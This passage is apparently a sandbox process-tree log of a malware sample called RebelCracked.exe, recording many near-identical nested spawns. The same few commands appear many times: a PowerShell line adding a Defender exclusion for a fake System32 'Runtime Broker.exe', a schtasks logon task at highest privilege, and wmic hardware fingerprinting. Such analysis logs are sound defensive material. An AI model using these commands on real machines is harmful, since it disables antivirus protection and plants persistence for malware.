C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST85⤵PID:476
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"85⤵PID:6780
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"86⤵PID:980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"87⤵PID:2824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"85⤵PID:6992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'86⤵PID:1340
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST86⤵PID:2704
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"86⤵PID:6380
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"87⤵PID:6900
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"88⤵PID:2084
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV189⤵PID:5468
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"86⤵PID:2744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'87⤵PID:6124
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST87⤵PID:976
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"87⤵PID:6288
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"88⤵PID:6024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"89⤵PID:5328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"89⤵PID:5308
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV190⤵PID:912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid90⤵PID:6816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"89⤵PID:1396
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name90⤵
- Detects videocard installed
PID:1460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"87⤵PID:1948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'88⤵PID:4388
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST88⤵PID:6264
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"88⤵PID:1416
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"89⤵PID:6508
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"90⤵PID:1484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"88⤵
- Drops file in System32 directory
PID:5500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'89⤵PID:4800
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST89⤵PID:1576
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"89⤵PID:5712
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"90⤵PID:5152
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"91⤵PID:6936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"89⤵PID:5548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'90⤵PID:5132
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST90⤵PID:6236
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"90⤵PID:5312
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"91⤵
- Blocklisted process makes network request
PID:5996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"92⤵PID:1344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"90⤵PID:5128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'91⤵
- Command and Scripting Interpreter: PowerShell
PID:5888
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST91⤵PID:2052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV192⤵PID:1604
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"91⤵PID:5480
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"92⤵PID:2748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"93⤵PID:5948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"91⤵
- Drops file in System32 directory
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'92⤵PID:2816
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST92⤵PID:3412
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"92⤵PID:2456
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"93⤵PID:6724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"94⤵PID:3324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"92⤵PID:4104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'93⤵
- Command and Scripting Interpreter: PowerShell
PID:1556
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST93⤵PID:5140
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"93⤵PID:1216
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"94⤵
- Blocklisted process makes network request
PID:4044 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"95⤵PID:560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"93⤵
- Drops file in System32 directory
PID:3824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'94⤵PID:6164
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST94⤵PID:3116
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"94⤵PID:3692
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"95⤵PID:3900
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"96⤵PID:3184
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV197⤵PID:432
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"94⤵PID:3588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'95⤵PID:2588
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST95⤵PID:6556
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"95⤵PID:568
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"96⤵PID:4872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"97⤵PID:1576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"95⤵PID:7044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'96⤵PID:4844
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST96⤵
- Scheduled Task/Job: Scheduled Task
PID:4332
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"96⤵PID:3132
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"97⤵PID:1672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"98⤵PID:5504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"96⤵PID:5748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'97⤵PID:6164
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST97⤵
- Scheduled Task/Job: Scheduled Task
PID:2092
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"97⤵PID:1820
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"98⤵PID:5324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"99⤵PID:3936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"97⤵PID:6532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'98⤵PID:6220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST98⤵PID:1484
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"98⤵PID:2652
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"99⤵PID:772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"100⤵PID:1332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"98⤵PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'99⤵PID:5520
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST99⤵PID:4388
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"99⤵PID:3644
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"100⤵
- Blocklisted process makes network request
PID:5680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"101⤵PID:6264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"99⤵PID:6944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'100⤵PID:6984
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST100⤵
- Scheduled Task/Job: Scheduled Task
PID:860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1101⤵PID:5308
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"100⤵PID:3320
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"101⤵PID:2228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"102⤵PID:7096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"102⤵PID:2116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1103⤵PID:1396
-
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid103⤵PID:5312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"102⤵PID:2640
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name103⤵
- Detects videocard installed
PID:3732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"100⤵PID:3560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'101⤵
- Command and Scripting Interpreter: PowerShell
PID:7072 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1102⤵PID:2360
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST101⤵PID:2080
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"101⤵PID:6768
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"102⤵PID:6280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"103⤵PID:3736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"101⤵
- Drops file in System32 directory
PID:1544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'102⤵PID:5076
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST102⤵PID:3776
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"102⤵PID:3760
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"103⤵PID:484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"104⤵PID:5680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"102⤵
- Drops file in System32 directory
PID:5560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'103⤵PID:5972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1104⤵PID:980
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST103⤵PID:4824
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1104⤵PID:6712
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"103⤵PID:1848
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"104⤵PID:6092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"105⤵PID:3756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"103⤵PID:5332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'104⤵PID:5616
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST104⤵
- Scheduled Task/Job: Scheduled Task
PID:3764
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"104⤵PID:1112
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"105⤵PID:5028
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"106⤵PID:7120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1107⤵PID:6688
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"104⤵PID:2156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'105⤵PID:5868
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST105⤵PID:6888
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"105⤵PID:6932
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"106⤵PID:7084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"107⤵PID:6952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"105⤵PID:784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'106⤵PID:5420
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST106⤵PID:1708
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"106⤵PID:5936
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"107⤵PID:5932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"108⤵PID:4104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"106⤵PID:5688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'107⤵PID:6580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST107⤵PID:6284
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"107⤵PID:796
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"108⤵PID:5320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"109⤵PID:1764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"107⤵PID:3096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'108⤵PID:5648
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST108⤵
- Scheduled Task/Job: Scheduled Task
PID:3184
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"108⤵PID:5804
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"109⤵PID:3688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"110⤵PID:7000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"108⤵PID:6568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'109⤵PID:1892
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST109⤵PID:860
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"109⤵PID:5592
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"110⤵PID:2488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"111⤵PID:5348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"109⤵PID:6416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'110⤵PID:6020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1111⤵PID:5504
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST110⤵PID:4808
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"110⤵PID:4736
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"111⤵
- Blocklisted process makes network request
PID:6612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"112⤵PID:5408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1113⤵PID:560
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"110⤵PID:6476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'111⤵PID:3148
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST111⤵PID:2836
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"111⤵PID:2156
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"112⤵PID:6136
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"113⤵PID:6396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"111⤵PID:5820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'112⤵PID:4572
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST112⤵PID:1296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1113⤵PID:6164
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"112⤵PID:2796
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"113⤵PID:4672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"114⤵PID:7148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"114⤵PID:6260
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid115⤵PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"114⤵PID:5108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1115⤵PID:4572
-
-
